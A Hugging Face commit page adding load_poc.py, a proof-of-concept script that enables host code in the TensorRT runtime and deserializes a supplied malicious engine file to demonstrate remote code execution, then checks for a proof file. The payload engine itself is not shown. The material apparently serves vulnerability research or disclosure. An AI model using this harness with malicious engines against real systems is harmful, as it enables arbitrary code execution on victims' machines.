Upload load_poc.py with huggingface_hub
Browse files- load_poc.py +84 -0
load_poc.py
ADDED
|
@@ -0,0 +1,84 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC Loader: Demonstrates RCE when loading a malicious TensorRT engine file.
|
| 4 |
+
|
| 5 |
+
Usage: python load_poc.py <path_to_malicious.engine>
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
import os
|
| 9 |
+
import sys
|
| 10 |
+
import platform
|
| 11 |
+
|
| 12 |
+
|
| 13 |
+
def main():
|
| 14 |
+
if len(sys.argv) < 2:
|
| 15 |
+
print("Usage: python load_poc.py <path_to_malicious.engine>")
|
| 16 |
+
sys.exit(1)
|
| 17 |
+
|
| 18 |
+
engine_path = sys.argv[1]
|
| 19 |
+
if not os.path.exists(engine_path):
|
| 20 |
+
print(f"[!] File not found: {engine_path}")
|
| 21 |
+
sys.exit(1)
|
| 22 |
+
|
| 23 |
+
try:
|
| 24 |
+
import tensorrt as trt
|
| 25 |
+
except ImportError:
|
| 26 |
+
print("[!] tensorrt not installed: pip install tensorrt")
|
| 27 |
+
sys.exit(1)
|
| 28 |
+
|
| 29 |
+
is_windows = platform.system() == "Windows"
|
| 30 |
+
poc_file = "tensorrt_rce_poc.txt" if is_windows else "/tmp/tensorrt_rce_poc"
|
| 31 |
+
|
| 32 |
+
# Clean up any previous proof file
|
| 33 |
+
if os.path.exists(poc_file):
|
| 34 |
+
os.remove(poc_file)
|
| 35 |
+
|
| 36 |
+
print("=" * 70)
|
| 37 |
+
print("TensorRT Engine RCE PoC — Loading Malicious Engine")
|
| 38 |
+
print("=" * 70)
|
| 39 |
+
print()
|
| 40 |
+
print(f"[*] Engine file: {engine_path}")
|
| 41 |
+
print(f"[*] Engine size: {os.path.getsize(engine_path)} bytes")
|
| 42 |
+
print(f"[*] TensorRT version: {trt.__version__}")
|
| 43 |
+
print()
|
| 44 |
+
|
| 45 |
+
logger = trt.Logger(trt.Logger.INFO)
|
| 46 |
+
runtime = trt.Runtime(logger)
|
| 47 |
+
|
| 48 |
+
# THIS IS THE CRITICAL LINE — enables loading embedded native code
|
| 49 |
+
runtime.engine_host_code_allowed = True
|
| 50 |
+
print("[*] runtime.engine_host_code_allowed = True")
|
| 51 |
+
print("[*] Calling deserialize_cuda_engine()...")
|
| 52 |
+
print("[*] (If RCE works, you'll see output from the embedded code below)")
|
| 53 |
+
print()
|
| 54 |
+
|
| 55 |
+
with open(engine_path, "rb") as f:
|
| 56 |
+
engine_data = f.read()
|
| 57 |
+
|
| 58 |
+
# THIS TRIGGERS THE RCE
|
| 59 |
+
engine = runtime.deserialize_cuda_engine(engine_data)
|
| 60 |
+
|
| 61 |
+
print()
|
| 62 |
+
if engine:
|
| 63 |
+
print(f"[+] Engine loaded: {engine.num_io_tensors} I/O tensors")
|
| 64 |
+
else:
|
| 65 |
+
print("[*] Engine returned None (malicious code may still have executed)")
|
| 66 |
+
|
| 67 |
+
# Check proof file
|
| 68 |
+
if os.path.exists(poc_file):
|
| 69 |
+
print()
|
| 70 |
+
print("=" * 70)
|
| 71 |
+
print("[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
|
| 72 |
+
print(f"[!!!] Proof file: {poc_file}")
|
| 73 |
+
print("=" * 70)
|
| 74 |
+
print()
|
| 75 |
+
with open(poc_file, "r") as f:
|
| 76 |
+
print(f.read())
|
| 77 |
+
else:
|
| 78 |
+
print()
|
| 79 |
+
print(f"[*] Proof file not found at {poc_file}")
|
| 80 |
+
print("[*] Check stderr output above for execution evidence")
|
| 81 |
+
|
| 82 |
+
|
| 83 |
+
if __name__ == "__main__":
|
| 84 |
+
main()
|